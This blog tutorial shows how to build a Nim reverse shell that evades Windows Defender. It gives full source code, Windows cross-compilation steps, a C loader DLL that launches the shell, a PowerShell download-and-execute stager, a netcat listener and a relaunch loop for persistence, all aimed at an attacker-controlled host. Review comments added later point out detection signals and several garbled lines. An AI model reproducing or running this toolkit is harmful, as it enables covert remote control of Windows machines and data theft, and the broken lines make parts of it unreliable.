Use nim compiled language to evade Windows Defender reverse shell detection

Use nim compiled language to evade Windows Defender reverse shell detection
Use nim compiled language to evade Windows Defender reverse shell detection bez0x December 20, 2022
# Linux-side build and runtime dependencies (Debian/Kali package names):
#   mingw-w64 - the cross toolchain that `nim c -d:mingw` and the
#               i686-/x86_64-w64-mingw32-gcc calls further down rely on
#   nim       - the compiler for reverse_shell.nim
#   rlwrap    - only used to wrap the nc listener at the end of the page
#   gedit     - editor; any editor will do
sudo apt install mingw-w64 
sudo apt install nim
sudo apt install rlwrap
sudo apt install gedit
# The Nim listing that follows is the content of this file.
gedit /tmp/reverse_shell.nim
import net
import osproc # this comes with execProcess, which returns the output of the command as a string
import os
import strutils

# NOTE(review): the whole listing is flush-left as rendered on the page. Nim is
# indentation-sensitive, so the bodies of the `if`, `while` and `try` blocks
# below must be indented for this to compile, and the curly quotes around the
# string literals are a rendering artefact as well. Read it for structure, not
# as a compilable file.

# these are the default connection parameters for the rev shell, but can be overwritten with command-line args
# The loopback default is only a placeholder; later on the page the binary is
# always launched as `rev-x86.exe <ip> <port>`.
var ip = “127.0.0.1”
var port = 4444

var args = commandLineParams() # returns a sequence (similar to a Python list) of the CLI arguments

# if arguments have been provided, assume they are an IP and port and overwrite the default IP/port values
# Anything other than exactly two arguments silently keeps the defaults;
# parseInt raises on a non-numeric port and nothing here catches that.
if args.len() == 2:
ip = args[0]
port = parseInt(args[1])

# begin by creating a new socket
# Plain TCP with no TLS: the prompt, every command line and every command
# output cross the wire in cleartext, so a network sensor sees the whole session.
var socket = newSocket()
echo “Attempting to connect to “, ip, ” on port “, port, “…”

while true:
# attempt to connect to the attacker’s host
try:
socket.connect(ip, Port(port))

# if the connection succeeds, begin the logic for receiving and executing commands from the attacker
while true:
try:

socket.send(“> “)
var command = socket.recvLine() # read in a line from the attacker, which should be a shell command to execute
# Each received line is executed as-is and, on the host, shows up as a child
# process of this binary (cmd.exe / powershell.exe, given the `cmd /c` /
# `powershell -c` prefix recommended at the end of the page) — that process
# lineage is the host-side signal a defender can key on.
var result = execProcess(command) # execProcess() returns the output of a shell command as a string
socket.send(result) # send the results of the command to the attacker

# if the attacker forgets they’re in a rev shell and tries to ctrl+c, which they inevitably will, close the socket and quit the program
# Bare `except:` — any error during the session (a plain disconnect included)
# ends the process; there is no reconnect once an established session drops,
# which is why the page later wraps the launch in a FOR /L loop on the Windows side.
except:
echo “Connection lost, quitting…”
socket.close()
system.quit(0)

# if the connection fails, wait 10 seconds and try again
# Unbounded retry every 10 s to one fixed ip:port — a regular beaconing
# pattern on the wire for as long as the listener is down.
except:
echo “Failed to connect, retrying in 10 seconds…”
sleep(10000) # note that sleep() takes its argument in milliseconds, at least by default
continue

 

# 32bits compilation
# -d:mingw cross-compiles to a Windows PE with the mingw-w64 toolchain installed
# at the top of the page; the -t/-l -m32 flags force 32-bit code generation and
# linking. Nothing in this pipeline signs the output.
nim c -d:mingw --cpu:i386 -t:-m32 -l:-m32 /tmp/reverse_shell.nim 
mv /tmp/reverse_shell.exe /tmp/rev-x86.exe

# 64bits compilation
# NOTE(review): the page renders this option with an en-dash (`–cpu`), unlike
# the `--cpu` spelling on the 32-bit line above; it looks like a copy/paste
# artefact of the page rather than a real nim option.
nim c -d:mingw –cpu:amd64 /tmp/reverse_shell.nim
mv /tmp/reverse_shell.exe /tmp/rev-x64.exe

 

# Symbol stripping only (see the author's note below). The code, imports and
# runtime behaviour — the outbound connection and the child-process pattern —
# are unchanged, so behaviour-based detection is unaffected by this step.
strip /tmp/rev-x86.exe
strip /tmp/rev-x64.exe
Use the strip command to remove debugging symbols
LHOST=192.168.62.161
LPORT=443
cd /tmp
# Loader DLL. The echo lines below write testdll.c: a DLL whose DllMain, on
# DLL_PROCESS_ATTACH, calls system() to START the already-staged rev-x86.exe
# from C:\Windows\Tasks and then ExitProcess(0), so the hosting process exits
# as soon as the client has been launched. No exported function is defined —
# the payload runs from DllMain alone, which is what the later
# `rundll32 rev-x86.dll,test` call relies on (`test` does not exist).
# LHOST/LPORT are expanded here, at build time, so the listener address ends
# up as a literal string inside the DLL — a static indicator.
# Detection angle: a DLL loaded into rundll32 that immediately spawns the
# command interpreter (system()), which in turn starts an unsigned exe from
# C:\Windows\Tasks.
echo "#include <windows.h>" > testdll.c
echo "BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {" >> testdll.c
echo "if (dwReason == DLL_PROCESS_ATTACH) {" >> testdll.c
# NOTE(review): the backslash escaping on this line appears mangled by the
# page rendering, so the path written into testdll.c may not be what the
# author intended.
echo "system(\"START /B C:\\\\\\Windows\\\\\\Tasks\\\\\\\\rev-x86.exe ${LHOST} ${LPORT}\"); ">> testdll.c
echo "ExitProcess(0);" >> testdll.c
echo "} ">> testdll.c
echo "return TRUE;" >> testdll.c
echo "}" >> testdll.c
# x86
# Cross-compiled with the mingw-w64 toolchain installed at the top of the page;
# nothing signs the result.
i686-w64-mingw32-gcc testdll.c -shared -o /tmp/rev-x86.dll

# x64
# Same source, 64-bit build — note that both DLLs still START the x86 exe.
x86_64-w64-mingw32-gcc testdll.c -shared -o /tmp/rev-x64.dll

 

LHOST=192.168.62.161
LPORT_web=80
file1=rev-x86.dll
file2=rev-x86.exe
# Stager. backup.bat, once run on the Windows host, fetches the DLL and the exe
# over cleartext HTTP with System.Net.WebClient.DownloadFile and drops them into
# C:\Windows\Tasks. Detection angle: `powershell -c` with a DownloadFile cradle,
# HTTP GETs for .dll/.exe/.bat objects, and new files under C:\Windows\Tasks.
# NOTE(review): the `\\\\` before ${file1}/${file2} looks like a rendering
# artefact of the page, as on the DLL build line above.
echo START /B powershell -c "(New-Object System.Net.Webclient).DownloadFile('http://${LHOST}:${LPORT_web}/${file1}','C:\Windows\Tasks\\\\${file1}')" > /tmp/backup.bat
echo START /B powershell -c "(New-Object System.Net.Webclient).DownloadFile('http://${LHOST}:${LPORT_web}/${file2}','C:\Windows\Tasks\\\\${file2}')" >> /tmp/backup.bat
# Serves the payloads. NOTE(review): --directory /tmp exposes the whole of /tmp
# (reverse_shell.nim, testdll.c, both DLLs and both exes), not just the two
# files backup.bat asks for.
python3 -m http.server 80 --directory /tmp
REM Typed on the Windows host: pulls backup.bat (the stager built above) from the
REM HTTP server and runs it via IEX, all inside one powershell.exe -c one-liner
REM started with START /B. Detection angle: a powershell.exe command line that
REM contains both DownloadFile and IEX, and a .bat written to C:\Windows\Tasks.
START /B powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.62.161:80/backup.bat','C:\Windows\Tasks\backup.bat');IEX 'c:\Windows\Tasks\backup.bat'
# Listener on the LPORT baked into the DLL and passed to the exe; the loop is
# meant to restart nc after each disconnect, and rlwrap only adds line editing.
# NOTE(review): `while;` with no command before `do` does not parse in bash as
# written, so this line needs its loop condition restored to behave as a loop.
while; do rlwrap nc -nlvp 443 ; done
REM Manual launch of the staged client: the two arguments are the listener's
REM ip/port (the Nim code keeps its 127.0.0.1:4444 defaults unless exactly two
REM arguments are given).
c:\Windows\Tasks\rev-x86.exe 192.168.62.161 443
We have a reverse shell connection!
REM FOR /L with a step of 0 never terminates: after each instance exits it waits
REM 2 s (timeout /t 2 /nobreak) and relaunches the client, covering the fact that
REM the Nim code quits on any session error. Detection angle: a fresh
REM rev-x86.exe process from C:\Windows\Tasks every ~2 s while no listener is up.
FOR /L %L IN (0,0,1) DO @(timeout /t 2 /nobreak >nul && c:\Windows\Tasks\rev-x86.exe 192.168.62.161 443)
REM Loads the loader DLL. NOTE(review): as written the rundll32 path is inside
REM C:\Windows\Tasks, where nothing on this page places a copy of it; and
REM testdll.c exports no `test` function — DllMain runs at load time regardless,
REM before rundll32 reports the missing entry point.
c:\Windows\Tasks\rundll32 rev-x86.dll,test
REM Commands entered inside the reverse shell session; each one is run by
REM execProcess on the host, hence the cmd /c / powershell -c prefix noted below.
cmd /c "dir c:\"
powershell -c "whoami"
Use the command prefix “cmd /c” or “powershell -c”.
